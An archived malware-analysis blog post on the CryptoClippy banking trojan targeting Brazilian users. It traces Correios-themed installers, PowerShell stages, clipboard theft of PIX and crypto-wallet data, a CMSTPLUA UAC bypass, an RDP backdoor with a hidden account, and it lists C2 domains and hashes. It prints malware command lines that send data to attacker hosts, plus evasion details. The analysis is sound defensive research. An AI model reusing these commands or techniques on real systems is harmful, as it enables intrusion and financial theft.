{
	"id": "11def925-953a-4785-af7e-27d88970460c",
	"created_at": "2026-04-06T00:06:36.867097Z",
	"updated_at": "2026-04-10T03:21:48.530152Z",
	"deleted_at": null,
	"sha1_hash": "61e3e3d3eb80af12681ed8930612ed46946e53fa",
	"title": "CryptoClippy is Evolving to Pilfer Even More Financial Data",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1582374,
	"plain_text": "CryptoClippy is Evolving to Pilfer Even More Financial Data\r\nBy Nicole Fishbein\r\nPublished: 2023-05-24 · Archived: 2026-04-05 16:19:45 UTC\r\nA banking trojan is a malware designed to steal sensitive financial information, such as online banking login\r\ncredentials, credit card numbers, and other financial data. Recently Unit42 released a detailed report about a new\r\nmalware called CryptoClippy that targets Portuguese speakers. The pesky malware uses the information from the\r\nclipboard to redirect money to crypto-wallets controlled by the threat actors.\r\nIn our research, we have uncovered evidence indicating that the CryptoClippy threat is undergoing rapid\r\nevolution and exceeding its initial scope of crypto wallet theft. Our findings indicate that the threat actors behind\r\nCryptoClippy are actively expanding its capabilities, now targeting a broader range of payment services\r\ncommonly used in Brazil. This discovery highlights the alarming nature of this evolving malware, as it signifies\r\na significant shift in the tactics employed by the malicious actors. As they continue to refine and enhance their\r\nmethods, the potential risks increase for financial data security in Brazil. Our investigation delves deep into these\r\nemerging patterns, shedding light on the evolving landscape of CryptoClippy and the imminent risks it poses to\r\nthe payment ecosystem in Brazil.\r\nDuring our research, we found that the attackers also use NSIS installers to deploy the first stage of the attack.\r\nWe were also able to acquire new malware samples from C2. While there are many similarities between our\r\nfindings and those described in the reports, we could pick up unique strings and functionalities that were not\r\npresent in the previously reported samples. One of the things that we noticed is that the threat targets services\r\nthat are specifically used in Brazil. Starting from the icon of the installer in the first stage that uses the logo of\r\nthe postal service of Brazil. And then the malware that looks for information associated with PIX – a payment\r\nservice used in Brazil.\r\nIn this blog, we will provide a technical analysis of the artifacts we found.\r\nTechnical Analysis of CryptoClippy\r\nWe identified a suspicious .NET sample that is signed by “PLK Management Limited,”\r\nand its metadata has the company and product name pointing to “WhatsApp.” Still, it doesn’t share code with the\r\nsoftware.\r\nWe named the installer of the first stage MINTYCIV.\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 1 of 13\n\n.NET MINTYCIV first stage installer.\r\nThe installer attempts to look like a legitimate application, but in the background, it attempts to connect to a\r\nremote C2 server. It decodes the URL using Base64, which resolves to https://mydigitalrevival[.]com/get.php and\r\nsends the string “82DPRmbP”. This domain was mentioned in the Unit42 post.\r\nWe found more files with the same signer however, unlike the first file, they are NSIS installers, like this file.\r\nMost of the files have an icon of Correios. This state-owned company operates the national postal service of\r\nBrazil. The submitted file name starts with Rastreio or Correios followed by four letters. Restreio translates to\r\n“tracking” in Portuguese and Correios means “mail” or “post office.”\r\nCorreios logo included with the files\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 2 of 13\n\nOne of the NSIS installers with the Correios logo \r\nAll files have the same behavior – extract and execute a BAT file that attempts to connect to a C2. The connection\r\nwill work only if the request is sent from Brazil. However, we overcame this check using a VPN, and thus, we got\r\nthe payload of the 2nd stage.\r\nvoc = 'O2mGSBzKDaVURN6fQpAYxXhn3dqwPy5J7ukbCFoI1svi4tHrWjcZElgLT9M80e' print(\"(\", voc[13],voc[61],voc[27],'-',v\r\nAbove, the BAT script extracted from NSIS installer.\r\nAfter the deobfuscation of the script, one of the executed commands will upload a string to a malicious remote\r\nserver. If the connection is successful, the remote server will send a PowerShell script that will be immediately\r\nexecuted.\r\n$result = (New-Object System.Net.WebClient).UploadString(\"http://ef0h.com/1/\", \"fXlD\")\r\nAfter executing the BAT file, if the connection is successful, the response is another script that will be executed as\r\nset by the previously executed command. This script collects information about the endpoint – computer name, the\r\noperating system name, display name, architecture, and the name of the antivirus software installed on the\r\nendpoint. \r\nNext, it makes a JSON structure in the following way: \r\nThe key ‘1’ has a unique identifier that changes between samples\r\nThe key ‘2’ stores the value representing the architecture\r\nThe key ‘10’ stores the base64 encoded string that holds the string with the information collected in the\r\nprevious step.\r\n${data}=@{\r\n'1'='3ptt9kcnrgslgt7gfjdojm2qu5'\r\n'2'='64' '10'=[Convert]::\"tObaSe64strING\"([Text.Encoding]::\"DEfAulT\".('GetBytes').Invoke(\"WINMACHINEmike;x64-bas\r\nThe JSON is sent to the same domain used in the previous stage. At this stage it is not clear which values are\r\nexpected by the host. But if the checks are passed, the server will send back a large JSON file processed by the\r\ncurrent script. The data seen above satisfies the checks on the server side, and we obtained the payload for the 2nd\r\nstage of the attack. \r\nThe response contains 5 parts: 3 scripts, a loader, and a configuration file – as described by Unit 42. We noticed\r\nthat in the first stage of the attack, a directory was created in AppDataRoaming, and the directory’s name changed\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 3 of 13\n\nbased on the response from the C2. We spotted the names Reposita or Flexizen, which is also the name of 3 of the\r\nscripts used in the first stage of the attack. \r\nOne of the PowerShell scripts (Reposita.ps) decodes the loader of the 2nd stage (the file named sc) and injects it\r\ninto the currently executed process (PowerShell). Similarly to the previous report, the payload is encoded with\r\nXOR, but the key is shorter. After decoding the payload, we got a DLL file. The XOR key used in this execution is\r\n0x1a, 0x13, 0x37, 0xe8, 0xea, 0xb0, 0xb2, 0x94, 0x8b, 0x0b, 0x2d, 0xaa, 0x52, 0xe9, 0xeb, 0x25.\r\nOnce we removed the obfuscations from the PowerShell script, we identified strong similarities to an open-source\r\nproject implementing an injection method. It is possible that the CryptoClippy malware developers cloned the\r\nproject, removed the symbols and added a layer of obfuscation, and deployed this script. \r\nThe script that injects the 2nd loader (after removing the obfuscation from the script)\r\nThe 2nd stage loader is a 64-bit DLL with one exported function – main. The logic of the loader is similar to the\r\none reported by Unit 42, as it also appears to use SysWhisper, an open-source project that implements direct\r\nsystem calls execution for evading detection. In addition, both loader versions use Ntdll to resolve API functions,\r\nand the API names are hashed. \r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 4 of 13\n\nAnalysis of the CryptoClippy loader we inspected.\r\nThe loader we found has two unique strings. One of them is client-injector64.dll which seems to be the name of\r\nthe DLL.\r\nWe noticed that both loader versions, before making the injection, call RtlGetVersion to get information about the\r\noperation system of the victim endpoint. The loader checks the OSVERSIONINFOEX.wProductType of the\r\nvictim machine. It will proceed only if the major version is 6 or 10 and the correct minor version is defined in the\r\ndocumentation.\r\nFrom this check, we understand that the malware targets Windows versions starting from Vista and above.\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 5 of 13\n\nSource: https://learn.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-osversioninfoa\r\nUpdates to the CryptoClippy Malware\r\nThe payload of the loader from the previous stage is CryptoClippy malware and the sample that we obtained\r\nshares most of its code with the samples that were published in the previous report. While the main functionality\r\nof the malware stayed the same, there are several changes that we noticed.\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 6 of 13\n\nAnalysis of the CryptoClippy malware sample obtained from the C2.\r\nInformation Stealing\r\nIn the sample we analyzed, there are 3 functions for processing the clipboard’s content. One of them is responsible\r\nfor switching the address of crypto wallets – as described in the Unit 42 post. One of the other functions takes the\r\nclipboard’s content and sends it to the C2. And the third function checks if the clipboard contains the string\r\n“0014br.gov.bcb.pix”, as seen in the screenshot below. If it’s found, the content is sent to the remote server. PIX is\r\nan online payment platform created by the Central Bank of Brazil. It allows users to make transactions using a\r\nQRcode or an equivalent code that contains the strings: “0014br.gov.bcb.pix”. The recipient of the payments\r\ncreates a QRcode that must contain the following information: “PIX Key,” “Beneficiary Name,” and “Beneficiary\r\nCity.”\r\n00020126580014br.gov.bcb.pix0136123e4567-e12b-12d1-a456-426655440000 5204000053039865802BR5913Fulano de Tal6008\r\nAbove, PIX copy-and-paste format as mentioned in the document of the Central Bank.\r\nWe found no indications of attempts to introduce a new payload into the clipboard if it detects a PIX string.\r\nInstead, the captured content is promptly sent to the C2 server. Building upon the existing functionality of\r\nCryptoClippy, which involves swapping crypto wallets, we have reason to believe that this method will persist in\r\nfuture iterations.\r\nAdditionally, we anticipate that the forthcoming version will possess an added capability — the ability to\r\nsubstitute the intercepted PIX string with one under the control of the threat actors. This insidious modification\r\nwould effectively redirect all payments to their designated account. \r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 7 of 13\n\nCMSTPLUA CLSID used by the malware in UAC bypass.\r\nBesides the capabilities above, the malware obtains the user name, computer name, Windows version, and\r\nfirmware information (using GetSystemFirmwareTable). It queries the value ‘RSMB’ repressing the SMBIOS\r\nfirmware table provider. Then it opens the registry key SOFTWARE\\GbPlugin\\Uni and gets the value of\r\ngFaYEcJ9U3dI and gFaYEcJ9U3RB. The key is created by a plugin called gbplugin whose purpose is to secure\r\nthe connection to internet banking services. It is not clear what sort of information is stored in these registry\r\nentries, but all of the information that was collected in this stage is sent to the C2. \r\nPersistence\r\nAs reported, the malware sets persistence on the victim machine by creating an LNK at\r\nAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupReposita.lnk.\r\nWe identified a unique way in which the malware creates the LNK file. It calls the CoCreateInstance function,\r\ncreating an object of the class specified by the CLSID value. CLSID is a unique identifier of a COM class object.\r\nIn our case, the CLSID is {000214EE-0000-0000-C000-00000000046}. Looking up this value, we get only two\r\nresults (the top result is Portuguese):\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 8 of 13\n\nThis handler points to the IShellLinkA interface, which provides methods for working with Shell links – LNK\r\nfiles. The target of the LNK file is the bat file from the second stage (Repoista.bat). This script is responsible for\r\nexecuting the PowerShell script that injects the loader.\r\nThe malware contains 3 scripts that are executed in different stages of the malware execution. The name of the\r\nscripts changes between samples since it depends on the configuration. All of the scripts are encoded using RC4.\r\nAs described by Unit42, one of the files creates a scheduled task for persistence, and a BAT file executes the script\r\n– the 2nd script dropped by the malware. We noticed a unique way the malware executes the bat file with elevated\r\npermissions.\r\nFirst, it queries the TokenInfomration of the process using GetTokenInformation and checks if the process has\r\nalready elevated permissions using TokenElevation class. If so, it will execute the bat file. Otherwise, it will check\r\nthe security policy by checking the registry value at\r\n“SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System”. If the value is one of the following:\r\nEnableLUA, ConsentPromptBehaviorAdmin, or ConsentPromptBehaviorUser – the trojan will not execute the\r\nscript at all. If none of these values are set, it checks the value of TOKEN_ELEVATION_TYPE to examine the\r\ntoken type. If the value is TokenElevationTypeLimited (numerical value 3), it will use the CMSTPLUA COM\r\n{3E5FC7F9-9A51-4367-9063-A120244FBEC7} interface to bypass UAC and execute the script with elevated\r\npermissions. This technique was previously used by other threats, such as DarkSide ransomware.\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 9 of 13\n\nCMSTPLUA CLSID used by the malware in UAC bypass.\r\nIf the token elevation type is TokenElevationTypeDefault, the malware will use “runas” to execute the script as an\r\nadministrator. \r\nThe third script we decoded is responsible for enabling and setting up a configuration for the Remote Desktop\r\nService. The script configures the port for the connection, it sets the SecuirtyLayer to be on the lowest level,\r\nwhich specifies that the Microsoft Remote Desktop Protocol (RDP) will be used by the server and the client for\r\nauthentication before a remote desktop connection is established, it sets the userAuthentication to 0 -which\r\nspecifies that Network-Level user authentication is not required before the remote desktop connection is\r\nestablished. Lastly, using a user name passed as an argument to the script, the script creates a new user account\r\nand appends it to: HKLM:SOFTWAREMicrosoftWindows\r\nNTCurrentVersionWinlogonSpecialAccountsUserList to hide it from winlogon.\r\nThe script also sends information about the endpoint to the C2. The data contains the OS version, computer name,\r\narchitecture, and indicators on whatever rdpclip.exe and rfxvmt.dll are present on the endpoint. Rdclip allows to\r\nuse of the clipboard during remote desktop sessions, and rfxvmt implements RemoteFX, a collection of graphical\r\nfunctionalities designed to enhance remote connections. However, it was deprecated due to many security\r\nvulnerabilities.\r\nIn the sample we inspected, the function that generates folder and mutex names uses the same proprietary\r\nalgorithm, but the format is changed to “%ls%08x,” and the constant passed to the function is 0x973C8F.\r\nNetwork\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 10 of 13\n\nThe domain name of the C2, as we see in the sample we analyzed, is flowmudy[.]com. The URL that is being sent\r\nis in the format of: https://flowmudy.com/?act=481c. The value of “act” changes depending on the function that\r\ninitiates the communication. The user agent is stored in the hardcoded configuration into the executable and\r\nencoded with RC4. CryptoClippy uses two different configurations- one is the pf file received from the remote\r\nserver in the first stage of the attack, and the second is hardcoded in the .data section of the malware. The first\r\nconfiguration file contains encoded script names and content, crypto wallet addresses, and the domain name of the\r\nC2 servers. The latter contains the URL format described above and the following user agent.\r\n%s %s HTTP/1.1\r\nHost: %.*s\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Sa\r\nContent-Length: %d\r\nThe decoded user agent, above.\r\nConclusions of CryptoClippy Analysis\r\nIn conclusion, our analysis of CryptoClippy has revealed its rapid evolution, expanding from basic crypto wallet\r\ntheft to reconnaissance gathering and extracting critical payment application and transaction information from\r\nunsuspecting victims in Brazil. Evidence suggests upcoming enhancements that will further expand its\r\ncapabilities. Organizations and individuals must stay abreast of emerging trends and fortify their security defenses\r\nto combat this rapidly evolving menace effectively. \r\nIOCs\r\nDLL loader\r\n894ad71e6fea9a5068512a7de5c2b176bc9556acf96284f131614d0e402059dc\r\n02af8c455fc32e0e79d5b7be2d6349ddc95d747528e328715325947217933dac\r\n.NET loader\r\n19f0f8831ef9d561f6dc395eff55d165d614fa06d13a9a3d39b120ef18242f12\r\nNSIS Installers\r\nBb242ec30689f12d10986832a8548f23b06a7c1b5988797a48c6237fd51cde49\r\n0b88fed305f93003c520c9c8d06d93ff8f3530548423efcbc3cdff582c23d66f\r\n0cab35abbec588c09219ae34c4cee65eed1e980345f6d0ade152d330a4ae2c9b\r\n1633762047d7fc1c583e5fa358cb24b6408ceec1cf1f4f2a31f1c8aa1371c1c7\r\n30976656db4334e494615b0e893b001045f4714259b8089bbcfca59203a0ce3d\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 11 of 13\n\n32ad6008209b9a48e5c0fdad6b2bcd5dd374a9c273d99d82a339939f450d6f42\r\n3d18564402263bb7e7f9091b154990c3c15cbd8d86610a23b389fb1e5fc65723\r\n417f2fc47353b84b56cc5f438d53570901740037a41012d6f4d3168cbd40a7ff\r\n49300936a4e0986e98bbb681312b18e4305fb3fd5f53e31985721e267745cff5\r\n4f9e65266f0842856dfba4d1d3c9dc278e5521ef3ca521f1726ed1d1e8a547df\r\n64ecc4d34f45662b32387008b5d81b21bd995af399a6957ca2c1441756073307\r\n6768e39b94159e39b517250a047a2e043f9cd4e360c12c19d88113aa475f1ca6\r\n6dc5788049de41f09f32ffe2c84c715353efe32536fccb9c44254de8e8eae575\r\n7861b9c78ae234bb636bf67b369a19bbcf83092f999a85397d25a08626f79bd6\r\n8446de8cdcddf6b7e023fbe353e69d51a6cb4105c52709a618e88b2ac77645ad\r\n8784e81c8aa147548f057c3b162a7c717fddc450028a4c3dc4271eead5b2a68a\r\n8bdcea1224ef19f6c00986c2b06754d132ead4a602147b0db8d1adda35a64914\r\n94f2e8062a586486528c6eef2a6302106ae3eb69eba3cb1e37d77f22024a8496\r\n97abe330295c853554e516cb2ac946f053696c5396e755b2abd7606a4e24d82e\r\n9dc2dc7cb68b26395de3840f096ddae825681cb86c4facb054da81708cebe970\r\nab053769b445fb833f11f65e1ec2f238ffd14dd38c5173f755133caae0ed425d\r\nb2a18f5dc63c87bbb39b8b7e722bfc83b75e3fc15a5367ead1b2e5c74be7f30a\r\nb33e440e1af58cf61543158123699dcc21716d1fbf820bb36b578b0da2da8e26\r\nbb242ec30689f12d10986832a8548f23b06a7c1b5988797a48c6237fd51cde49\r\nbf71c9f9b2eacbd02bdb0296cdf2533df41a8ec53e894af91a720cfaefa84066\r\nc1a8f5a1eaa54d7a895afe298e41ccc2acc018133bea1588eb00d1c04d809b4f\r\nc4a6c74441fa701ee5568420ed0d930b2636d46239b7558df946de26a026af4e\r\nd76ffe1bd489d2c1e2ed5c64849aeffe23d4ffe82597e40a030e9a634305b07f\r\nd9ba0ffebeff80a7d19dfd9b848b5e96dfda72a4b8f749bd5032145abd7eb86f\r\ndd8e58d3dfcb3ba2675638ccf36dbdb90fce4f29e9c91256269218d8b6431763\r\nf99351a25ae8890fa91674a5ce54ce4ff8d46c3e93f16debc0852d4d8431d49b\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 12 of 13\n\nfa5f1116478d45d74c2ed175a0c507abcdeedf07096e3a43144fa19cec427575\r\nbdd98909fb388401919b5fd465e54266845cd74e75f60ff97703fabc35664a9a\r\nCryptoClippy samples\r\nd2c85de7c763e8d8990d06f78f226fda36443253c63678c7c0e998499f3af61a\r\n02af8c455fc32e0e79d5b7be2d6349ddc95d747528e328715325947217933dac\r\nDomains used by the loader\r\nhttp://ef0h[.]com/1/\r\nhttp://4a3d[.]com/1/\r\nhttp://b3do[.]com/1/\r\nhttp://yogarecap[.]com/1/\r\nDomains used by the malware\r\nnicerypx[.]com\r\nflowmudy[.]com\r\nSource: https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nhttps://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/"
	],
	"report_names": [
		"cryptoclippy-evolves-to-pilfer-more-financial-data"
	],
	"threat_actors": [],
	"ts_created_at": 1775433996,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/61e3e3d3eb80af12681ed8930612ed46946e53fa.pdf",
		"text": "https://archive.orkl.eu/61e3e3d3eb80af12681ed8930612ed46946e53fa.txt",
		"img": "https://archive.orkl.eu/61e3e3d3eb80af12681ed8930612ed46946e53fa.jpg"
	}
}